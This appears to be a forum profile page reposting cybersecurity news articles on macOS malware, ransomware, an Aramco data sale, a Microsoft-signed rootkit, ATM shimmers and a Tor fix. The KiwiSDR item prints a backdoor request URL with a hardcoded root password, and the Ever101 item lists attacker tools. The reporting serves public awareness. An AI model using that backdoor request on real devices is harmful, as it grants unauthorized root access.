Jump to content


  • Content Count

  • Joined

  • Last visited

Community Reputation

2 Neutral

1 Follower

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Security researchers have published details about the method used by a strain of macOS malware to steal login information from multiple apps, enabling its operators to steal accounts. Dubbed XCSSET, the malware keeps evolving and has been targeting macOS developers for more than a year by infecting local Xcode projects. Stealing Telegram accounts, Chrome passwords XCSSET collects from infected computers files with sensitive information belonging to certain applications and sends them to the command and control (C2) server. One of the targeted apps is Telegram instant messaging software. The malware creates the archive “telegram.applescript” for the “keepcoder.Telegram” folder under the Group Containers directory. Collecting the Telegram folder allows the hackers to log into the messaging app as the legitimate owner of the account. Researchers at Trend Micro explain that copying the stolen folder on another machine with Telegram installed gives the attackers access to the victim’s account. XCSSET can steal sensitive data this way because normal users can access the Application sandbox directory with read and write permissions. “Not all executable files are sandboxed on macOS, which means a simple script can steal all the data stored in the sandbox directory” - Trend Micro The researchers also analyzed the method used to steal the passwords saved in Google Chrome, a technique that requires user interaction and has been described since at least 2016. The threat actor needs to get the Safe Storage Key, which is stored in the user’s keychain as “Chrome Safe Storage.” However, they use a fake dialog to trick the user into giving administrator privileges to all of the attacker’s operations necessary to get the Safe Storage Key that can decrypt passwords stored in Chrome. Once decrypted, all the data is sent to the attacker’s command and control server. Similar scripts exist in XCSSET for stealing sensitive data from other apps: Contacts, Evernote, Notes, Opera, Skype, WeChat. Trend Micro researchers say that the latest version of XCSSET they analyzed also has an updated list of C2 servers and a new “canary” module for cross-site scripting (XSS) injections in the experimental Chrome Canary web browser. While the recent updates of the malware are far from adding significant features, they show that XCSSET is evolving and adapting continuously. XCSSET is targeting the latest macOS version (currently Big Sur) and has been seen in the past leverage a zero-day vulnerability to circumvent protections for full disk access and avoid explicit content from the user. __________________
  2. Attackers have stolen 1 TB of proprietary data belonging to Saudi Aramco and are offering it for sale on the darknet. The Saudi Arabian Oil Company, better known as Saudi Aramco, is one of the largest public petroleum and natural gas companies in the world. The oil giant employs over 66,000 employees and brings in almost $230 billion in annual revenue. The threat actors are offering Saudi Aramco's data starting at a negotiable price of $5 million. Saudi Aramco has pinned this data incident on third-party contractors and tells BleepingComputer that the incident had no impact on Aramco's operations. "Zero-day exploitation" used to breach network This month, a threat actor group known as ZeroX is offering 1 TB of proprietary data belonging to Saudi Aramco for sale. ZeroX claims the data was stolen by hacking Aramco's "network and its servers," sometime in 2020. As such, the files in the dump are as recent as 2020, with some dating back to 1993, according to the group. When asked by BleepingComputer as to what method was used to gain access to the systems, the group did not explicitly spell out the vulnerability but instead called it "zero-day exploitation." To create traction among prospective buyers, a small sample set of Aramco's blueprints and proprietary documents with redacted PII were first posted on a data breach marketplace forum in June this year: Forum post with a link to the dark web leak site (BleepingComputer) However, at the time of initial posting, the .onion leak site had a countdown timer set to 662 hours, or about 28 days, after which the sale and negotiations would begin. ZeroX told BleepingComputer that the choice of "662 hours," was intentional and a "puzzle" for Saudi Aramco to solve, but the exact reason behind the choice remains unclear: Threat actors announced data would be up for sale after 662 hours (BleepingComputer) The group says that the 1 TB dump includes documents pertaining to Saudi Aramco's refineries located in multiple Saudi Arabian cities, including Yanbu, Jazan, Jeddah, Ras Tanura, Riyadh, and Dhahran. And, that some of this data includes: Full information on 14,254 employees: name, photo, passport copy, email, phone number, residence permit (Iqama card) number, job title, ID numbers, family information, etc. Project specification for systems related to/including electrical/power, architectural, engineering, civil, construction management, environmental, machinery, vessels, telecom, etc. Internal analysis reports, agreements, letters, pricing sheets, etc. Network layout mapping out the IP addresses, Scada points, Wi-Fi access points, IP cameras, and IoT devices. Location map and precise coordinates. List of Aramco's clients, along with invoices and contracts. Samples of stolen Saudi Aramco data and blueprints shared on leak site (BleepingComputer) Samples released by ZeroX on the leak site have personally identifiable information (PII) redacted, and a 1 GB sample alone costs US$2,000, paid as Monero (XMR). The threat actor, however, did share a few recent unredacted documents with BleepingComputer for confirmation. The price of the entire 1 TB dump is set at US$5 million, although the threat actors say, the amount is negotiable. A party requesting for an exclusive, one-off sale (i.e. obtain the complete 1 TB dump and demand it be wiped completely from ZeroX's end) is expected to pay a whopping US$50 million. ZeroX shared with BleepingComputer that up until this point, they have been negotiating the sale with five buyers. Not a ransomware or extortion incident Contrary to some claims floating around on the internet [1, 2] labeling this incident a "ransomware attack," it is not. Both the threat actor and Saudi Aramco have confirmed to BleepingComputer that this is not a ransomware incident. Saudi Aramco told BleepingComputer that the data breach occurred at third-party contractors, rather than direct exploitation of Aramco's systems: "Aramco recently became aware of the indirect release of a limited amount of company data which was held by third party contractors." "We confirm that the release of data has no impact on our operations, and the company continues to maintain a robust cybersecurity posture," an Aramco spokesperson told BleepingComputer. Mysteriously enough, the threat actors did not even inform Saudi Aramco of the stolen data, or attempt extortion after gaining access to their networks, which further casts doubts on the purpose of the timer shown above. It seems the countdown timer was merely set up as a lure for prospective buyers; to generate an initial buzz around the sale. In 2012, a prominent data breach against Saudi Aramco's systems wiped over 30,000 computer hard drives clean. The cyberwarfare incident conducted via the Shamoon virus was allegedly linked to Iran. In more recent times, attacks on mission-critical infrastructure like the Colonial Pipeline and the largest U.S. propane provider, AmeriGas, have prompted a need for stepping up cybersecurity efforts at these facilities. __________________
  3. Moldova's "Court of Accounts" has suffered a cyberattack leading to the agency's public databases and audits being destroyed. Court of Accounts of Moldova is a government authority that performs audits of public financial resources and government agencies to comply with international standards. Yesterday, Moldovia's state news agency Moldpres reported on behalf of the Court of Accounts that their website was hacked, and threat actors destroyed audit reports and other public data. “It is for the first time when the supreme audit institution faces such a situation. The destruction of the public page took place in the context of important audits and with impact in the society, at the stage of reporting and making public of the most significant audit missions planned in the institution’s work,’’ the Court of Accounts said. The attack has led the agency to shut down its website while the incident is investigated and data can be restored. Website for Court of Accounts The agency states that they are investigating whether the attack was arbitrary, done for extortion, or to disrupt their work. "The needed investigations will identify whether the attack has been organized by hackers arbitrarily, on purposes of blackmailing, or it is about a planned order, in order to create impediments to the work of the country’s supreme audit institution," said the Court of Accounts. While this cyberattack was destructive for the Court of Accounts, the threat actors could have caused further damage by using the site to distribute malware to visitors. Last week, researchers from T&T Security disclosed that the Kazakhstan government's 'Open Budgets' website used by government agencies and local government branches to publish budget reports was hacked to distribute malicious office documents that installed malware. __________________
  4. The author of a popular software-defined radio (SDR) project has removed a "backdoor" from radio devices that granted root-level access. The backdoor had been, according to the author, present in all versions of KiwiSDR devices for the purposes of remote administration and debugging. Last night, the author pushed out a "bug fix" on the project's GitHub aimed at removing this backdoor silently, which sparked some backlash. Since then, the author's original forum posts and comments with any mention of "backdoor" have been removed over the last few hours. Hardcoded password gives root access to all devices KiwiSDR is a software-defined radio that can be attached to an embedded computer, like Seeed BeagleBone Green (BBG). It is provided either as a standalone board or a more complete version featuring BBG, a GPS antenna, and an enclosure. KiwiSDR user interface with different RF controls SDRs are aimed at replacing radio frequency (RF) communication hardware with software or firmware for carrying out signal processing activities that would normally require hardware devices. The concept is analogous to software-defined networking. Yesterday, Mark Jessop, an RF engineer, and radio operator came across an interesting forum post in which the author of the KiwiSDR project admitted to having remote access to all radio receiver devices running the software. Another user, M. dug out a 2017 forum thread where KiwiSDR's developer admitted that a backdoor indeed provided them with remote access to all KiwiSDR devices. Although the entire KiwiSDR forum site has become inaccessible as of today, an archived copy of the forum post seen by BleepingComputer confirms the contents of the tweet: KiwiSDR software author stated there's a backdoor in all devices giving them remote access Furthermore, as of today, over 600 KiwiSDR devices are online with the backdoor still present in them, as highlighted by Hacker Fantastic. Although these devices are mainly acting as radio receivers, it is worth noting, any remote actor who logs in using the hardcoded master password is granted root-level access to the device's (Linux-based) console. This can enable adversaries to probe into the IoT devices, take them over, and begin traversing adjacent networks the radio devices are connected to: "These KiwiSDRs are used for receiving HF radio stations. The backdoor itself doesn't give an attacker any special SDR access, just that they can access the console of the device (Linux) and start pivoting into networks," ethical hacker xssfox told BleepingComputer. An image of the KiwiSDR administration panel obtained by BleepingComputer shows console level access with root access (notice the #) is possible: KiwiSDR remote admin panel provides root access to the device console A video created by xssfox demonstrates how the backdoor can be exploited via a simple HTTP GET request, which looks like: Code: http://radio-device-domain.example.com:8074/admin?su=kconbyp Note: the superuser password (kconbyp) shown above is an older password, SHA256 hash of which used to be present on KiwiSDR devices. The more recent hash (shown below) is different, indicating "kconbyp" won't work on later versions of KiwiSDR and that a newer master password has been present. Dev pushes out "bug fix" overnight removing the backdoor As seen by BleepingComputer, as of a few hours ago a fix has been committed to KiwiSDR's GitHub project removing the backdoor code. The update removes multiple administrative functions, and specifically the code that compares the provided master password against its SHA256 hash: KiwiSDR author removes hardcoded password from devices (GitHub) Jessop clarified that there is no indication of KiwiSDR's author having misused the backdoor access, which had been introduced with the intention of debugging KiwiSDR devices in good faith. He further said KiwiSDR developer has been extremely responsive in patching bugs and adding features. But, like others, the engineer did express concerns, that the master password would transmit over HTTP enabling any Man-in-the-Middle (MitM) threat actor to potentially intercept it and consequently gain remote access to all devices. Some Redditors also expressed that backdoors were never okay, regardless of whether HTTPS was in use: "No way. Back doors are never okay. Password was sent in the clear, as HTTPS isn't supported. Eventually someone would have exploited this. Hell, someone might have already exploited this and we just don't know about it," said one of the users in a thread. KiwiSDR users should upgrade to the latest version v1.461 released today on GitHub that removes the backdoor from their radio devices. __________________
  5. Kaseya has warned customers that an ongoing phishing campaign attempts to breach their networks by spamming emails bundling malicious attachments and embedded links posing as legitimate VSA security updates. "Spammers are using the news about the Kaseya Incident to send out fake email notifications that appear to be Kaseya updates. These are phishing emails that may contain malicious links and/or attachments," the company said in an alert issued on Thursday evening. "Do not click on any links or download any attachments claiming to be a Kaseya advisory. Moving forward, Kaseya email updates will not contain any links or attachments." Attackers try to backdoor recipients' systems While the company did not provide additional details regarding these attacks, the warning perfectly lines up with another series of malspam emails targeting Kaseya customers with Cobalt Strike payloads. As BleepingComputer first reported, Malwarebytes Threat Intelligence researchers have recently discovered a series of phishing attacks trying to take advantage of the ongoing Kaseya ransomware crisis. "A malspam campaign is taking advantage of Kaseya VSA ransomware attack to drop CobaltStrike," Malwarebytes researchers said. "It contains an attachment named 'SecurityUpdates.exe' as well as a link pretending to be security update from Microsoft to patch Kaseya vulnerability!" Kaseya phishing email sample (Malwarebytes) The attackers' end goal is to deploy Cobal Strike beacons on the recipients' devices to backdoor them and steal sensitive info or deliver more malware payloads. Once the targets run the malicious attachment or download and execute the fake Microsoft update on their devices, the attackers gain persistent remote access to the now compromised systems. In June, following the Colonial Pipeline attack, threat actors also used fake systems updates claiming to help block ransomware infections. These two campaigns highlight that cybercriminals behind phishing attacks keep up with the latest news to push lures relevant to recent events to boost their campaigns' success rates. Given that Kaseya has so far failed to deploy a fix for the VSA zero-day exploited by REvil, some of its customers might fall for this campaign's tricks in their effort to protect their networks from attacks. Light at the end of the tunnel The highly-publicized REvil ransomware attack that hit Kaseya and approximately 1,500 of their direct customers and downstream businesses makes for a perfect lure theme. After the attack was disclosed, CISA and the FBI have shared guidance on how to deal with the attack's aftermath, and the White House National Security Council is urging victims to follow the guidance issued by Kaseya and report incidents to the FBI. However, despite the attack's massive reach, which has led to some calling the largest ransomware attack ever, multiple victims told BleepingComputer that their backups were not affected, and they are restoring systems rather than paying a ransom. Victims who do ultimately pay REvil's ransoms will likely only do so because their backups failed or they had no backups, to begin with. __________________
  6. The REvil ransomware gang is increasing the ransom demands for victims encrypted during Friday's Kaseya ransomware attack. When conducting an attack against a business, ransomware gangs, such as REvil, typically research a victim by analyzing stolen and public data for financial information, cybersecurity insurance policies, and other information. Using this information, the number of encrypted devices, and the amount of stolen data, the threat actors will come up with a high-ball ransom demand that they believe, after negotiations, the victim can afford to pay. However, with Friday's attack on Kaseya VSA servers, REvil targeted the managed service providers and not their customers. Due to this, the threat actors could not determine how much of a ransom they should demand from the encrypted MSP customers. As a solution, it seems the ransomware gang created a base ransom demand of $5 million for MSPs and a much smaller ransom of $44,999 for the MSP's customers who were encrypted. Ransom demand for Kaseya ransomware victims It turns out this $44 thousand number is irrelevant as in numerous negotiation chats shared with and seen by BleepingComputer, the ransomware gang is not honoring these initial ransom demands. When encrypting a victim's network, REvil can use multiple encrypted file extensions during the attack. The threat actors typically provide a decryptor that can decrypt all extensions on the network after a ransom is paid. For victims of the Kaseya ransomware incident, REvil is doing things differently and demanding between $40,000 and $45,000 per individual encrypted file extension found on a victim's network. A portion of REvil ransom negotiation For one victim who stated they had over a dozen encrypted file extensions, the ransomware gang demanded a $500,000 ransom to decrypt the entire network. $500,000 ransom to decrypt the entire network However, the good news is that the REvil representatives have told victims that they only encrypted networks, and nothing more. This means that REvil likely did not steal any of the victims' data, as they are known to use that as leverage in ransomware negotiations immediately. REvil indicates data was not stolen This also indicates that the ransomware operation did not access the victim's networks before the attack. Instead, they likely remotely exploited the Kaseya VSA vulnerability to distribute the encryptor and execute it on the victim's devices. Attack's aftermath Since the attacks on Friday, Kaseya has been working on releasing a patch for the zero-day vulnerability exploited in the REvil attack. This zero-day was discovered by DIVD researchers who disclosed the t to Kaseya and helping test the patch. Unfortunately, REvil found the vulnerability simultaneously and launched their attack on Friday before the patch was ready, just in time for the US Fourth of July holiday weekend. It is believed that over 1,000 businesses have been affected by the attack, including attacks on the Swedish Coop supermarket chain, which had to close approximately 500 stores, a Swedish pharmacy chain, and the SJ transit system. President Biden has directed US intelligence agencies to investigate the attack but has not gone as far to state that the attacks originated from Russia. The FBI also announced today that they are investigating the incident and working closely with CISA and other agencies. "The FBI is investigating the Kaseya ransomware incident and working closely with CISA and other interagency partners to understand the scope of the threat." "If you believe your systems have been compromised, we encourage you to employ all recommended mitigations, follow Kaseya's guidance to shut down your VSA servers immediately and report to the FBI at ic3.gov," said the FBI in a press statement. __________________
  7. Dutch cybersecurity firm Tesorion has released a free decryptor for the Lorenz ransomware, allowing victims to recover some of their files for free without paying a ransom. Lorenz is a human-operated ransomware that began operating in April 2021 and has since listed twelve victims whose data they have stolen and leaked on their ransomware data leak site. Lorenz ransomware data leak site Lorenz is not particularly active and has begun to taper off in recent months compared to other operations. Lorenz ransomware decryptor released The Lorenz ransomware decryption tool can be downloaded from NoMoreRansom and will allow victims to recover some of their encrypted files. Unlike other ransomware decryptors that include the actual decryption key, Tesorion's decryptor operates differently and can only decrypt certain file types. Tesorion researcher Gijs Rijnders told BleepingComputer that only files with well-known file structures could be decrypted, such as Office documents, PDF files, some image types, and movie files. While the decryptor will decrypt not every file type, it will still allow those who do not pay the ransom to recover important files. As you can see below, the decryptor can decrypt well-known file types, such as XLS and XLSX files, without a problem. However, it will not decrypt unknown file types or those with uncommon file structures. Lorenz ransomware decryptor In addition to providing a decryptor, Tesorion provided insight into the encryption technique used by the Lorenz ransomware. In a blog post, Rijnders explains that a bug in how they implement their encryption can cause data to become lost, which would prevent a file from being decrypted even if a ransom was paid. "The result of this bug is that for every file which’s size is a multiple of 48 bytes, the last 48 bytes are lost. Even if you managed to obtain a decryptor from the malware authors, these bytes cannot be recovered," explains Rijnders. __________________
  8. Microsoft has now confirmed signing a malicious driver being distributed within gaming environments. This driver, called "Netfilter," is in fact a rootkit that was observed communicating with Chinese command-and-control (C2) IPs. G Data malware analyst Karsten Hahn first took notice of this event last week and was joined by the wider infosec. community in tracing and analyzing the malicious drivers bearing the seal of Microsoft. It turns out, the C2 infrastructure belongs to a company classified under "Communist Chinese military" by the US Department of Defense. This incident has once again exposed threats to software supply-chain security, except this time it stemmed from a weakness in Microsoft's code-signing process. "Netfilter" driver is rootkit signed by Microsoft Last week, G Data's cybersecurity alert systems flagged what appeared to be a false positive, but was not—a Microsoft signed driver called "Netfilter." The driver in question was seen communicating with China-based C&C IPs providing no legitimate functionality and as such raised suspicions. This is when G Data's malware analyst Karsten Hahn shared this publicly and simultaneously contacted Microsoft: The malicious binary has been signed by Microsoft (VirusTotal) "Since Windows Vista, any code that runs in kernel mode is required to be tested and signed before public release to ensure stability for the operating system." "Drivers without a Microsoft certificate cannot be installed by default," states Hahn. At the time, BleepingComputer began observing the behavior of C2 URLs and also contacted Microsoft for a statement. The first C2 URL returns a set of more routes (URLs) separated by the pipe ("|") symbol: Navigating to the C2 URL presents more routes for different purposes Each of these serves a purpose, according to Hahn: The URL ending in "/p" is associated with proxy settings, "/s" provides encoded redirection IPs, "/h?" is for receiving CPU-ID, "/c" provided a root certificate, and "/v?" is related to the malware's self-update functionality. As seen by BleepingComputer, for example, the "/v?" path provided URL to the malicious Netfilter driver in question itself (living at "/d3"): Path to malicious Netfilter driver The G Data researcher spent some time sufficiently analyzing the driver and concluded it to be malware. The researcher has analyzed the driver, its self-update functionality, and Indicators of Compromise (IOCs) in a detailed blog post. "The sample has a self-update routine that sends its own MD5 hash to the server via hxxp://," says Hahn. An example request would look like this: Code: hxxp:// "The server then responds with the URL for the latest sample, e.g. hxxp:// or with 'OK' if the sample is up-to-date. The malware replaces its own file accordingly," further explained the researcher. Malware's self-update functionality analyzed by G Data During the course of his analysis, Hahn was joined by other malware researchers including Johann Aydinbas, Takahiro Haruyama, and Florian Roth. Roth was able to gather the list of samples in a spreadsheet and has provided YARA rules for detecting these in your network environments. Notably, the C2 IP that the malicious Netfilter driver connects to belonged to Ningbo Zhuo Zhi Innovation Network Technology Co., Ltd, according to WHOIS records. The U.S. Department of Defense (DoD) has previously marked this organization as a "Communist Chinese military company," another researcher @cowonaut observed. Microsoft admits to signing the malicious driver Microsoft is actively investigating this incident, although thus far, there is no evidence that stolen code-signing certificates were used. The mishap seems to have resulted from the threat actor following Microsoft's process to submit the malicious Netfilter drivers, and managing to acquire the Microsoft-signed binary in a legitimate manner: "Microsoft is investigating a malicious actor distributing malicious drivers within gaming environments." "The actor submitted drivers for certification through the Windows Hardware Compatibility Program. The drivers were built by a third party." "We have suspended the account and reviewed their submissions for additional signs of malware," said Microsoft yesterday. According to Microsoft, the threat actor has mainly targeted the gaming sector specifically in China with these malicious drivers, and there is no indication of enterprise environments having been affected so far. Microsoft has refrained from attributing this incident to nation-state actors just yet. Falsely signed binaries can be abused by sophisticated threat actors to facilitate large-scale software supply-chain attacks. The multifaceted Stuxnet attack that targeted Iran's nuclear program marks a well-known incident in which code-signing certificates were stolen from Realtek and JMicron to facilitate the attack. This particular incident, however, has exposed weaknesses in a legitimate code-signing process, exploited by threat actors to acquire Microsoft-signed code without compromising any certificates. __________________
  9. In 2015, police departments worldwide started finding ATMs compromised with advanced new “shimming” devices made to steal data from chip card transactions. Authorities in the United States and abroad had seized many of these shimmers, but for years couldn’t decrypt the data on the devices. This is a story of ingenuity and happenstance, and how one former Secret Service agent helped crack a code that revealed the contours of a global organized crime ring. Jeffrey Dant was a special agent at the U.S. Secret Service for 12 years until 2015. After that, Dant served as the global lead for the fraud fusion center at Citi, one of the largest financial institutions in the United States. Not long after joining Citi, Dant heard from industry colleagues at a bank in Mexico who reported finding one of these shimming devices inside the card acceptance slot of a local ATM. As it happens, KrebsOnSecurity wrote about that particular shimmer back in August 2015. This card ‘shimming’ device is made to read chip-enabled cards and can be inserted directly into the ATM’s card acceptance slot. The shimmers were an innovation that caused concern on multiple levels. For starters, chip-based payment cards were supposed to be far more expensive and difficult for thieves to copy and clone. But these skimmers took advantage of weaknesses in the way many banks at the time implemented the new chip card standard. Also, unlike traditional ATM skimmers that run on hidden cell phone batteries, the ATM shimmers found in Mexico did not require any external power source, and thus could remain in operation collecting card data until the device was removed. When a chip card is inserted, a chip-capable ATM reads the data stored on the smart card by sending an electric current through the chip. Incredibly, these shimmers were able to siphon a small amount of that power (a few milliamps) to record any data transmitted by the card. When the ATM is no longer in use, the skimming device remains dormant, storing the stolen data in an encrypted format. Dant and other investigators looking into the shimmers didn’t know at the time how the thieves who planted the devices went about gathering the stolen data. Traditional ATM skimmers are either retrieved manually, or they are programmed to transmit the stolen data wirelessly, such as via text message or Bluetooth. But recall that these shimmers don’t have anywhere near the power needed to transmit data wirelessly, and the flexible shimmers themselves tend to rip apart when retrieved from the mouth of a compromised ATM. So how were the crooks collecting the loot? “We didn’t know how they were getting the PINs at the time, either,” Dant recalled. “We found out later they were combining the skimmers with old school cameras hidden in fake overhead and side panels on the ATMs.” Investigators wanted to look at the data stored on the shimmer, but it was encrypted. So they sent it to MasterCard’s forensics lab in the United Kingdom, and to the Secret Service. “The Secret Service didn’t have any luck with it,” Dant said. “MasterCard in the U.K. was able to understand a little bit at a high level what it was doing, and they confirmed that it was powered by the chip. But the data dump from the shimmer was just encrypted gibberish.” Organized crime gangs that specialize in deploying skimmers very often will encrypt stolen card data as a way to remove the possibility that any gang members might try to personally siphon and sell the card data in underground markets. THE DOWNLOAD CARDS Then in 2017, Dant got a lucky break: Investigators had found a shimming device inside an ATM in New York City, and that device appeared identical to the shimmers found in Mexico two years earlier. “That was the first one that had showed up in the U.S. at that point,” Dant said. The Citi team suspected that if they could work backwards from the card data that was known to have been recorded by the skimmers, they might be able to crack the encryption. “We knew when the shimmer went into the ATM, thanks to closed-circuit television footage,” Dant said. “And we know when that shimmer was discovered. So between that time period of a couple of days, these are the cards that interacted with the skimmer, and so these card numbers are most likely on this device.” Based off that hunch, MasterCard’s eggheads had success decoding the encrypted gibberish. But they already knew which payment cards had been compromised, so what did investigators stand to gain from breaking the encryption? According to Dant, this is where things got interesting: They found that the same primary account number (unique 16 digits of the card) was present on the download card and on the shimmers from both New York City and Mexican ATMs. Further research revealed that account number was tied to a payment card issued years prior by an Austrian bank to a customer who reported never receiving the card in the mail. “So why is this Austrian bank card number on the download card and two different shimming devices in two different countries, years apart?” Dant said he wondered at the time. He didn’t have to wait long for an answer. Soon enough, the NYPD brought a case against a group of Romanian men suspected of planting the same shimming devices in both the U.S. and Mexico. Search warrants served against the Romanian defendants turned up multiple copies of the shimmer they’d seized from the compromised ATMs. “They found an entire ATM skimming lab that had different versions of that shimmer in untrimmed squares of sheet metal,” Dant said. “But what stood out the most was this unique device — the download card.” The download card (right, in blue) opens an encrypted session with the shimmer, and then transmits the stolen card data to the attached white plastic device. Image: KrebsOnSecurity.com. The download card consisted of two pieces of plastic about the width of a debit card but a bit longer. The blue plastic part — made to be inserted into a card reader — features the same contacts as a chip card. The blue plastic was attached via a ribbon cable to a white plastic card with a green LED and other electronic components. Sticking the blue download card into a chip reader revealed the same Austrian card number seen on the shimming devices. It then became very clear what was happening. “The download card was hard coded with chip card data on it, so that it could open up an encrypted session with the shimmer,” which also had the same card data, Dant said. The download card, up close. Image: KrebsOnSecurity.com. Once inserted into the mouth of ATM card acceptance slot that’s already been retrofitted with one of these shimmers, the download card causes an encrypted data exchange between it and the shimmer. Once that two-way handshake is confirmed, the white device lights up a green LED when the data transfer is complete. THE MASTER KEY Dant said when the Romanian crew mass-produced their shimming devices, they did so using the same stolen Austrian bank card number. What this meant was that now the Secret Service and Citi had a master key to discover the same shimming devices installed in other ATMs. That’s because every time the gang compromised a new ATM, that Austrian account number would traverse the global payment card networks — telling them exactly which ATM had just been hacked. “We gave that number to the card networks, and they were able to see all the places that card had been used on their networks before,” Dant said. “We also set things up so we got alerts anytime that card number popped up, and we started getting tons of alerts and finding these shimmers all over the world.” For all their sleuthing, Dant and his colleagues never really saw shimming take off in the United States, at least nowhere near as prevalently as in Mexico, he said. The problem was that many banks in Mexico and other parts of Latin America had not properly implemented the chip card standard, which meant thieves could use shimmed chip card data to make the equivalent of old magnetic stripe-based card transactions. By the time the Romanian gang’s shimmers started showing up in New York City, the vast majority of U.S. banks had already properly implemented chip card processing in such a way that the same phony chip card transactions which sailed through Mexican banks would simply fail every time they were tried against U.S. institutions. “It never took off in the U.S., but this kind of activity went on like wildfire for years in Mexico,” Dant said. The other reason shimming never emerged as a major threat for U.S. financial institutions is that many ATMs have been upgraded over the past decade so that their card acceptance slots are far slimmer, Dant observed. “That download card is thicker than a lot of debit cards, so a number of institutions were quick to replace the older card slots with newer hardware that reduced the height of a card slot so that you could maybe get a shimmer and a debit card, but definitely not a shimmer and one of these download cards,” he said. Shortly after ATM shimmers started showing up at banks in Mexico, KrebsOnSecurity spent four days in Mexico tracing the activities of a Romanian organized crime gang that had very recently started its own ATM company there called Intacash. Sources told KrebsOnSecurity that the Romanian gang also was paying technicians from competing ATM providers to retrofit cash machines with Bluetooth-based skimmers that hooked directly up to the electronics on the inside. Hooked up to the ATM’s internal power, those skimmers could collect card data indefinitely, and the data could be collected wirelessly with a smart phone. Follow-up reporting last year by the Organized Crime and Corruption Reporting Project (OCCRP) found Intacash and its associates compromised more than 100 ATMs across Mexico using skimmers that were able to remain in place undetected for years. The OCCRP, which dubbed the Romanian group “The Riviera Maya Gang,” estimates the crime syndicate used cloned card data and stolen PINs to steal more than $1.2 billion from bank accounts of tourists visiting the region. Last month, Mexican authorities arrested Florian “The Shark” Tudor, Intacash’s boss and the reputed ringleader of the Romanian skimming syndicate. Authorities charged that Tudor’s group also specialized in human trafficking, which allowed them to send gang members to compromise ATMs across the border in the United States. __________________
  10. A ransomware targeting an Israeli company has led researchers to track a portion of a ransom payment to a website promoting sensual massages. The attack was conducted by a more recent ransomware operation known as Ever101 who compromised an Israeli computer farm and proceeded to encrypt its devices. In a new report by Israeli cybersecurity firms Profero and Security Joes, who performed incident response on the attack, the Ever101 is believed to be a variant of the Everbe or Paymen45 ransomware. When encrypting files, the ransomware will append the .ever101 extension and drop a ransom note named !=READMY=!.txt in each folder on the computer. Example Ever101 ransom note While investigating one of the infected machines, the researchers found a 'Music' folder that contained various tools used during the attack, providing insight into the threat actor's tactics, techniques, and procedures. "During our investigation of the infected machines, we came across what seemed to be a treasure trove of information stored in the Music folder. It consisted of the ransomware binary itself, along with several other files—some encrypted, some not—that we believe the threat actors used to gather intelligence and propagate through the network," explains Profero's and Security Joe's report. The known tools used by the Ever101 gang include: xDedicLogCleaner - Cleans all Windows event logs, system logs, and the temp folder. PH64.exe - 64-bit version of the Process Hacker program Cobalt Strike - The threat actors deployed cobalt Strike to provide remote access to machines and perform surveillance on the network. In this particular attack, the Cobalt Strike beacon was embedded in a WEXTRACT.exe file with an expired Microsoft signature. SystemBC - SystemBC was used to proxy Cobalt Strike traffic through SOCKS5 proxy to avoid detection. Other tools were also found but were encrypted by the ransomware. Based on the names and other characteristics, the researchers believe the ransomware gang used the following tools as well: SoftPerfect Network Scanner - An IPv4/IPv6 network scanner. shadow.bat - Likely a batch file used to clear Shadow Volume Copies from the Windows device. NetworkShare_pre2.exe - Enumerates a Windows network for shared folders and drives. Of interest is that some of the files shared by the attackers, such as WinRar, were localized in Arabic. WinRar with Arabic localization Profero CEO Omri Moyal told BleepingComputer that he believes the Arabic localization to some of these tools is a "false flag." Following the money to a sensual massage Of particular interest is what the researchers discovered after they used CipherTrace to track the ransom payment as it flowed through different bitcoin wallets. While tracing the payment, they found a small portion, 0.01378880 BTC or approximately $590, was sent to a 'Tip Jar' on the RubRatings site. RubRatings is a website that allows "massage and body rub providers" in the USA to advertise their services, many of them offering sensual massages and showing barely nude pictures. Each masseuse profile includes a Tip Jar button that allows customers to leave a bitcoin tip for their recent massage. RubRatings Bitcoin Tip Jar The researchers believe that some of the ransom payment went to an Ever101 operative in the USA, who then used the coins to tip a masseuse, or more likely, use the site as a way to launder the ransom payment. "The second possibility is that the provider on the site was used as another method of obfuscating the bitcoin movement," the researchers explain. "It could be that the provider who possesses the bitcoin wallet in question was working with the threat actor(s), but more likely, it is a fake account set up to enable money transfers." "The bitcoin in the wallet linked to RubRatings received the payment around 15:48 UTC, and it left the wallet just a few minutes later, at 15:51 UTC." As bitcoin is becoming more easily traced, and even recovered by law enforcement, ransomware operations are looking for novel approaches to launder their ill-gotten gains. It is likely that the threat actors created a fake account on RubRatings and were using the Tip Jar feature as a way to launder the ransom by making it look like a tip to a masseuse. __________________
  11. The Tor Project has released Tor Browser 10.0.18 to fix numerous bugs, including a vulnerability that allows sites to track users by fingerprinting the applications installed on their devices. In May, JavaScript fingerprinting firm FingerprintJS disclosed a 'scheme flooding' vulnerability that allows the tracking of users across different browsers based on the applications installed on their device. To track users, a tracking profile is created for a user by attempting to open various application URL handlers, such as zoommtg://, and checking if the browser launches a prompt, like the one for Zoom below.. Zoom URL Handler If the application's prompt is displayed, it can be assumed that the application is installed on the device. By checking for numerous URL handlers, the vulnerability can create an ID based on the unique configuration of installed apps on the user's device. This ID can then be tracked across different browsers, including Google Chrome, Edge, Tor Browser, Firefox, and Safari. This vulnerability is especially concerning for Tor users who use the browser to protect their identity and IP address from being logged with sites. As this vulnerability tracks users across browsers, it could allow web sites, and even law enforcement, to track a user's real IP address when they switch to a non-anonymizing browser, such as Google Chrome. With the release of Tor Browser 10.0.18, the Tor Project has introduced a fix for this vulnerability by setting the 'network.protocol-handler.external' setting to false. This default setting will prevent the browser from passing the handling of a particular URL to an external application and thus no longer trigger the application prompts. Full changelog The full changelog for Tor 10.0.18 is: All Platforms Update Tor to Android Update Fenix to 89.1.1 Update NoScript to 11.2.8 Bug 40055: Rebase android-components patches on 75.0.22 for Fenix 89 Bug 40165: Announce v2 onion service deprecation on about:tor Bug 40166: Hide "Normal" tab (again) and Sync tab in TabTray Bug 40167: Hide "Save to Collection" in menu Bug 40169: Rebase fenix patches to fenix v89.1.1 Bug 40170: Error building tor-browser-89.1.1-10.5-1 Bug 40432: Prevent probing installed applications Bug 40470: Rebase 10.0 patches onto 89.0 Build System Android Bug 40290: Update components for mozilla89-based Fenix You can upgrade to Tor Browser 10.0.18 by opening the menu, going to Help, and selecting About Tor Browser, which will automatically check for and install any new updates. You can also download the latest browser from the Tor Browser download page and the distribution directory. __________________
